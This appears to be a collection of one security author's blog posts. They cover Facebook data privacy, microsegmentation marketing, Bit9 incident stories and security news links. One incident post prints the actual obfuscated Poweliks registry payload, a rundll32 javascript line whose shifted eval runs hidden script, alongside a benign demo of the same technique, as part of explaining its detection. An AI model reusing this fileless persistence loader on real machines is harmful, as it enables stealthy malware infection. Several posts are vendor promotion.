It’s Not Your Data! Turn Off All Your Facebook Privacy Settings

There are lots of folks decrying the Facebook “breach”, where a third party company abused the terms of service and leeched a bunch of data to the seemingly shady Cambridge Analytica. I love how people are referring to this as “their private data being stolen”. IT’S NOT YOUR DATA.


Well, at least not in the United States. In the US, when you give your private data to a company, it’s no longer private with the exception of healthcare data (HIPAA), children’s data (COPPA), and some credit data (FACTA). So, when you logged into Facebook and told them all the things you like, you gave them that data.

The true deception here is Facebook’s “privacy” setting. It gives you the false pretense that it’s your data to decide what you want to do with it. Google, Microsoft, Apple, just about everyone has created this false pretense, and we all gleefully ignore that there are no legal protections in the United States about this so-called private data.

I have an easy solution! Turn off all the privacy settings. Set everything to public. Don’t fool yourself into a false sense of privacy. If you want to be private, don’t post it on social media.

You should think of three people before sharing something online: your mother, your boss, and your kid. If any of those three people shouldn’t see it, then it shouldn’t be posted.

I’m not saying that online privacy doesn’t exist. The US does protect private information that is meant to be private from one party to an another and in other situations covered by a patchwork of laws.

I’m also not saying that online privacy shouldn’t exist. I consider myself a privacy advocate. All the actions we take online leave a digital trail. Facebook and others are notorious for tracking as much as that as possible. I think there are great dangers when insurance firms and financial firms use social media tracking data to make risk-based decisions. What about our offline activities? If a firm is using license plate scanners to build marketable data, where are our privacy rights then?

Worried about Facebook and other social media sites tracking you? I highly recommend Privacy Badger from Electronic Frontier’s Foundation.

If we want to change the way we treat data, we have to honest with ourselves about what is real privacy protection, and what makes us feel safe. Social media sites make money off data you provide them. Other companies and even governments are using that data. Use social media with eyes wide open.

Once you accept the truth, then you have the power to decide what to share, and what to keep private.


What is Microsegmentation?

Last week Gartner published the Top 10 Technologies for Information Security in 2016.  In that list, they include microsegmentation, a term many security professionals are unaware of.  This is exciting for me at Drawbridge Networks, since PathProtect is the only technology on the market that provides microsegmentation for the entire enterprise, securing traffic workstation to workstation, workstations to server, and server to server.

To put it simply, microsegmentation is ability to do two things:

  1. Identify network traffic based on something more than layer 4 information, i.e. user, application, etc.
  2. Control network traffic using that additional information in a policy driven manner.

The biggest need for this technology is for east/west traffic, i.e. not traversing a firewall, router, and/or switch.

First, some history

When TCP/IP and ethernet was gaining a foothold as being the networking platform of choice over token ring and others, it was easy to map OSI layers to devices (need an OSI refresher?).  Hubs were layer 1, switches were layer 2, routers were layer 3, and firewalls were layer 4.  If you wanted to divide a network into two IP segments, you used a router.  If you wanted to segment your network by port, you used a firewall.  If you wanted to move a computer from one network segment to another, you walked down to the communication closet, and moved the cable from one switch to another.

Then enters the Virtual Local Area Network (VLAN) in the 90s.  Broadcast storms were a real pain and segmenting with routers was cost limiting.  VLANs were a solution to this broadcast problem, but the new flexibility and ease of being able to segment on the fly became quite popular.  This popularity bred multifunction network devices such as layer 3 switches.

By the late 90s, we had cost effective switches with routing capabilities.  The security capabilities of these multifunction devices increased to include Access Control Lists (ACLs), Private VLANs, etc. Creating network segments was no longer bounded by cost.  Routers also started expanding past layer 3 to be able to do port based ACLs.  As we entered into the 2000s, stateful firewalls were also being built into single multifunction devices.

All of this was a great advancement for security, but even today many enterprises are still stuck segmenting at OSI layer 4 and below with just IP and port.  Essentially, all network architecture and segmentation schemes are built with this limitation as a core design principle.  Security innovation continued but instead of advancing segmentation techniques, network security vendors seemed to change focus their focus to layer 7 inspection and building “appliances”.  Unfortunately, you cannot have an appliance everywhere in your network.

Beyond Layer 4 – How to Get Microsegmentation

There are many shortcomings to only using IP and port as way to segment your network for security.  The primary tool used by most today, VLANs, was never built with security in mind, only to reduce broadcast traffic.  ACLs help control traffic, but most enterprises have decades old ACLs that are costly to manage.  Attackers are able to move around from endpoint to workstation with impunity.  We have to control the east/west traffic flow to effectively secure our networks.

Here are the current technologies that enable microsegmentation:


As the popularity of OS virtualization developed, hardware based networking devices were a limiting factor in the flexibility and scalability virtualization had to offer.  From that need sprung Network Function Virtualization or NFV.

NVF is a new label on what has been developing for the last 10-15 years, which is building software that provides the same functionality as networking devices.  In 2012 the European Telecommunications Standards Institute (ETSI) dedicated a group to start producing standards for NFV.

Because of the flexibility a virtual networking device can offer, microsegmentation has been added to that list of capabilities.  The most prominent method is to “tag” traffic with a proprietary tag.  Then other NVF devices from that vendor can respond to that tag to control the network traffic according to a policy.

Note: ETSI has not published a standard or draft for microsegmentation , so each NVF vendor will have implementation differences.


Paralleling the development of NVF was a movement to get beyond centralized network orchestration and have true centralized management with a programmatic interface.  A new concept emerged: separating the control plane, the basic switching/routing functions, from the management plane.  This separation of these logical functions is what is known by Software Defined Networking (SDN) today.

As the last decade was coming to a close, SDN gained its footing.  2011 saw the founding of the Open Networking Foundation and the first release of OpenFlow. This standard has paved the way to make multiplatform SDN a reality.  That hasn’t stopped some big vendors from creating their own “standard”, like Cisco’s Open Network Environment.

SDN has a lot of promise, including the ability to perform microsegmentation in a similar manner as the NVF implementations.  However, SDN is not an easy thing to implement.  The value that it brings makes it worth the cost if you are a cloud or data center provider.  For most enterprises, the cost of implementation far outweighs the benefits.

Enterprise Microsegmentation

NFV and SDN are promising technologies and are currently reshaping data centers. However, attackers often target endpoint workstations as an initial point of compromise. Spear phishing emails with malicious links and attachments are used to gain a foothold, and then attackers move laterally from workstation to workstation in search of valuable hosts such as those used by DBAs or IT Systems Administrators.

Microsegmentation of endpoint workstations might prevent those infections from spreading laterally, but there are definitive shortcomings when microsegmentation is implemented in the network using technologies like SDN.  There are certain things that you cannot see from the network, like what process sent that network traffic?  What user started that process?

PathProtect takes a different approach.  Instead of trying to reengineer your entire network, PathProtect uses endpoint agents to understand the context of the network data. These endpoint agents are easy to deploy, and provide information about all of the lateral communications going on in the network as well as the process and user context associated with them.  Then, using a policy based engine, PathProtect can control who can do what, performing enforcement at each endpoint.  This way, PathProtect decouples the network policy from the physical architecture of the network itself, allowing for instant reconfiguration of segments on the fly.

PathProtect uses mutual endpoint authorization to ensure that the client sending the traffic is authorized to do so and that the server is authorized to accept the traffic.  This can provide your enterprise with a default-deny posture.  If an attacker were to walk into your office and plug in his own laptop, no workstation or server would respond.

Just like a drawbridge, both sides must be open to allow traffic to pass.


Gartner has brought to light the new security concept of microsegmentation and highlighted its importance. There’s no need to invest in network rearchitecture to start controlling your east/west traffic.  For a fraction of the time, and a fraction of the price, you can implement microsegmentation today.

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

This blog post I wrote for the Bit9 Blog and was published on January 21st, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:


The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.


Scan-based Forensics Solutions Are for Cavemen

This blog post I wrote for the Bit9 Blog and was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in:

c:\windows\system32\tasks, that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file got dropped into the C:\windows\system32 directory, another file with a different name appears in the c:\windows\syswow64 folder as well. Both of the dll files appear to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because he knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Interesting Read: ParanoiDF – PDF Analysis & Password Cracking Tool

As I browse the internet, I find security news that I find interesting. Here is one such article:

ParanoiDF – PDF Analysis & Password Cracking Tool

Original article from Darknet – The Darkside
Original article posted on August 13, 2014 at 11:15AM

Interesting Read: Your PC or laptop may have a backdoor enabled by default, millions do

As I browse the internet, I find security news that I find interesting. Here is one such article:

Your PC or laptop may have a backdoor enabled by default, millions do

Computrace software, which is enabled by default on millions of PCs, could allow attacker to remotely wipe the hard drive. Researchers described the "backdoor" in BIOS/UEFI, as well as how it can be exploited at Black Hat USA. Although the suggested threat mitigation is the deactive Computrace, that’s not always possible.

Original article from Computerworld Blogs – Security
Original article posted on August 13, 2014 at 10:03AM

Interesting Read: How Hackable Is Your Car? Consult This Handy Chart

As I browse the internet, I find security news that I find interesting. Here is one such article:

How Hackable Is Your Car? Consult This Handy Chart

Last year, when hackers Charlie Miller and Chris Valasek showed they could hijack the steering and brakes of a Ford Escape and a Toyota Prius with nothing but laptops connected to the cars, they raised two questions: Could hackers perform the same tricks wirelessly, or even over the Internet? And even more pressing: Is your […]

Original article from WIRED » Threat Level
Original article posted on August 06, 2014 at 06:30AM